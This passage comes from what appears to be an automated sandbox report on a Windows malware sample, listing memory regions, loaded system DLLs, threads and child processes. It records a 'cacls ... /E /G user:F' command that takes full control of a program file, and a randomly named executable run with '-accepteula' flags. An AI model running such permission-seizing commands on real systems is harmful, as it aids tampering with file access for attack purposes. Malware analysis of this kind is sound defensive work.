6619 start_va = 0xfdefa90000 end_va = 0xfdefa9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fdefa90000" filename = "" Region: id = 6620 start_va = 0xfdefb70000 end_va = 0xfdefc6ffff entry_point = 0x0 region_type = private name = "private_0x000000fdefb70000" filename = "" Region: id = 6621 start_va = 0xfdefc70000 end_va = 0xfdefd2dfff entry_point = 0xfdefc70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6622 start_va = 0x7ff7fc460000 end_va = 0x7ff7fc55ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fc460000" filename = "" Region: id = 6623 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6624 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6625 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6626 start_va = 0xfdefb10000 end_va = 0xfdefb4ffff entry_point = 0x0 region_type = private name = "private_0x000000fdefb10000" filename = "" Region: id = 6627 start_va = 0xfdefd30000 end_va = 0xfdefeaffff entry_point = 0x0 region_type = private name = "private_0x000000fdefd30000" filename = "" Region: id = 6628 start_va = 0x7ff7fc58c000 end_va = 0x7ff7fc58dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc58c000" filename = "" Region: id = 6629 start_va = 0xfdefaa0000 end_va = 0xfdefaa6fff entry_point = 0x0 region_type = private name = "private_0x000000fdefaa0000" filename = "" Region: id = 6630 start_va = 0x7ffaed340000 end_va = 0x7ffaed392fff entry_point = 0x7ffaed340000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 6631 start_va = 0xfdefb50000 end_va = 0xfdefb50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fdefb50000" filename = "" Region: id = 6632 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6633 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6634 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6635 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6636 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6637 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6638 start_va = 0xfdefb60000 end_va = 0xfdefb66fff entry_point = 0x0 region_type = private name = "private_0x000000fdefb60000" filename = "" Region: id = 6639 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6640 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6641 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6642 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 6643 start_va = 0xfdefeb0000 end_va = 0xfdf0037fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fdefeb0000" filename = "" Region: id = 6644 start_va = 0xfdf0040000 end_va = 0xfdf01c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fdf0040000" filename = "" Region: id = 6645 start_va = 0xfdf01d0000 end_va = 0xfdf15cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fdf01d0000" filename = "" Region: id = 6646 start_va = 0xfdefd30000 end_va = 0xfdefd30fff entry_point = 0x0 region_type = private name = "private_0x000000fdefd30000" filename = "" Region: id = 6647 start_va = 0xfdefd40000 end_va = 0xfdefd40fff entry_point = 0x0 region_type = private name = "private_0x000000fdefd40000" filename = "" Region: id = 6648 start_va = 0xfdefea0000 end_va = 0xfdefeaffff entry_point = 0x0 region_type = private name = "private_0x000000fdefea0000" filename = "" Region: id = 6649 start_va = 0xfdefd50000 end_va = 0xfdefdbffff entry_point = 0x0 region_type = private name = "private_0x000000fdefd50000" filename = "" Region: id = 6667 start_va = 0xfdefd50000 end_va = 0xfdefd8ffff entry_point = 0x0 region_type = private name = "private_0x000000fdefd50000" filename = "" Region: id = 6668 start_va = 0xfdefdb0000 end_va = 0xfdefdbffff entry_point = 0x0 region_type = private name = "private_0x000000fdefdb0000" filename = "" Region: id = 6669 start_va = 0x7ff7fc58a000 end_va = 0x7ff7fc58bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc58a000" filename = "" Region: id = 6670 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 6671 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 6672 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6673 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 6674 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6675 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 6676 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 6677 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 6678 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 6679 start_va = 0xfdf15d0000 end_va = 0xfdf178ffff entry_point = 0x0 region_type = private name = "private_0x000000fdf15d0000" filename = "" Region: id = 6735 start_va = 0xfdf1790000 end_va = 0xfdf1ac6fff entry_point = 0xfdf1790000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6736 start_va = 0xfdefad0000 end_va = 0xfdefaf0fff entry_point = 0xfdefad0000 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 6737 start_va = 0xfdefdc0000 end_va = 0xfdefe18fff entry_point = 0xfdefdc0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 6738 start_va = 0xfdf1ad0000 end_va = 0xfdf1cecfff entry_point = 0x0 region_type = private name = "private_0x000000fdf1ad0000" filename = "" Region: id = 6739 start_va = 0xfdf1cf0000 end_va = 0xfdf1f03fff entry_point = 0x0 region_type = private name = "private_0x000000fdf1cf0000" filename = "" Region: id = 6740 start_va = 0xfdf15d0000 end_va = 0xfdf16d8fff entry_point = 0x0 region_type = private name = "private_0x000000fdf15d0000" filename = "" Region: id = 6741 start_va = 0xfdf1780000 end_va = 0xfdf178ffff entry_point = 0x0 region_type = private name = "private_0x000000fdf1780000" filename = "" Region: id = 6742 start_va = 0xfdf1f10000 end_va = 0xfdf212efff entry_point = 0x0 region_type = private name = "private_0x000000fdf1f10000" filename = "" Region: id = 6743 start_va = 0xfdf2130000 end_va = 0xfdf2240fff entry_point = 0x0 region_type = private name = "private_0x000000fdf2130000" filename = "" Region: id = 6784 start_va = 0xfdefad0000 end_va = 0xfdefb0ffff entry_point = 0x0 region_type = private name = "private_0x000000fdefad0000" filename = "" Region: id = 6785 start_va = 0xfdefd90000 end_va = 0xfdefd90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fdefd90000" filename = "" Region: id = 6786 start_va = 0x7ff7fc58e000 end_va = 0x7ff7fc58ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc58e000" filename = "" Region: id = 6787 start_va = 0xfdefdc0000 end_va = 0xfdefe77fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fdefdc0000" filename = "" Region: id = 6788 start_va = 0xfdefd90000 end_va = 0xfdefd93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fdefd90000" filename = "" Region: id = 6789 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 6790 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 6791 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 6813 start_va = 0xfdefda0000 end_va = 0xfdefda6fff entry_point = 0x0 region_type = private name = "private_0x000000fdefda0000" filename = "" Region: id = 6814 start_va = 0xfdefe80000 end_va = 0xfdefe84fff entry_point = 0xfdefe80000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 6815 start_va = 0xfdefe90000 end_va = 0xfdefe90fff entry_point = 0xfdefe90000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 6816 start_va = 0xfdf16e0000 end_va = 0xfdf16e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fdf16e0000" filename = "" Region: id = 6817 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 6818 start_va = 0xfdf16f0000 end_va = 0xfdf16f0fff entry_point = 0xfdf16f0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 6819 start_va = 0xfdf1700000 end_va = 0xfdf1701fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fdf1700000" filename = "" Region: id = 6820 start_va = 0xfdf16f0000 end_va = 0xfdf16f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fdf16f0000" filename = "" Thread: id = 839 os_tid = 0xa34 Thread: id = 842 os_tid = 0xabc Thread: id = 843 os_tid = 0xa30 Thread: id = 848 os_tid = 0x604 Process: id = "91" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x2066a000" os_pid = "0x370" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "82" os_parent_pid = "0xeac" cmd_line = "cacls \"C:\\Program Files\\Windows Journal\\Journal.exe\" /E /G CIiHmnxMn6Ps:F /C" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6705 start_va = 0xb50000 end_va = 0xb6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 6706 start_va = 0xb70000 end_va = 0xb71fff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 6707 start_va = 0xb80000 end_va = 0xb93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b80000" filename = "" Region: id = 6708 start_va = 0xba0000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 6709 start_va = 0xbe0000 end_va = 0xc1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 6710 start_va = 0xc20000 end_va = 0xc23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 6711 start_va = 0xd70000 end_va = 0xd79fff entry_point = 0xd70000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 6712 start_va = 0xd80000 end_va = 0x4d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 6713 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6714 start_va = 0x7f630000 end_va = 0x7f652fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f630000" filename = "" Region: id = 6715 start_va = 0x7f658000 end_va = 0x7f658fff entry_point = 0x0 region_type = private name = "private_0x000000007f658000" filename = "" Region: id = 6716 start_va = 0x7f65b000 end_va = 0x7f65bfff entry_point = 0x0 region_type = private name = "private_0x000000007f65b000" filename = "" Region: id = 6717 start_va = 0x7f65d000 end_va = 0x7f65ffff entry_point = 0x0 region_type = private name = "private_0x000000007f65d000" filename = "" Region: id = 6718 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6719 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6720 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 6721 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6722 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 6723 start_va = 0xc30000 end_va = 0xc30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c30000" filename = "" Region: id = 6724 start_va = 0xc40000 end_va = 0xc41fff entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 6725 start_va = 0x4f10000 end_va = 0x4f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f10000" filename = "" Region: id = 6726 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6727 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6728 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6729 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6730 start_va = 0x4f20000 end_va = 0x514ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f20000" filename = "" Region: id = 6731 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6732 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6733 start_va = 0xb50000 end_va = 0xb5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 6734 start_va = 0x7f530000 end_va = 0x7f62ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f530000" filename = "" Region: id = 6896 start_va = 0xc50000 end_va = 0xd0dfff entry_point = 0xc50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6897 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6898 start_va = 0xd10000 end_va = 0xd4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 6899 start_va = 0x4d80000 end_va = 0x4dbffff entry_point = 0x0 region_type = private name = "private_0x0000000004d80000" filename = "" Region: id = 6900 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6901 start_va = 0x7f655000 end_va = 0x7f657fff entry_point = 0x0 region_type = private name = "private_0x000000007f655000" filename = "" Region: id = 6902 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6903 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6904 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6905 start_va = 0xb60000 end_va = 0xb63fff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 6906 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6907 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6908 start_va = 0x74650000 end_va = 0x74677fff entry_point = 0x74650000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 6909 start_va = 0x4dc0000 end_va = 0x4f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004dc0000" filename = "" Region: id = 6910 start_va = 0xb70000 end_va = 0xb73fff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 6942 start_va = 0x5150000 end_va = 0x5486fff entry_point = 0x5150000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6943 start_va = 0xd50000 end_va = 0xd51fff entry_point = 0xd50000 region_type = mapped_file name = "cacls.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cacls.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cacls.exe.mui") Thread: id = 846 os_tid = 0x218 Thread: id = 853 os_tid = 0x5e8 Process: id = "92" image_name = "vidhs3md.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe" page_root = "0x2cb51000" os_pid = "0x204" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "89" os_parent_pid = "0x688" cmd_line = "vIDhS3md.exe -accepteula \"Genko_1.jtp\" -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6746 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6747 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6748 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6749 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6750 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6751 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6752 start_va = 0x400000 end_va = 0x476fff entry_point = 0x400000 region_type = mapped_file name = "vidhs3md.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe") Region: id = 6753 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6754 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6755 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 6756 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 6757 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 6758 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6759 start_va = 0x7fff0000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6760 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6761 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 6762 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6763 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6774 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 6775 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6776 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6777 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6778 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6779 start_va = 0x480000 end_va = 0x73ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 6780 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6781 start_va = 0x74d30000 end_va = 0x74ea5fff 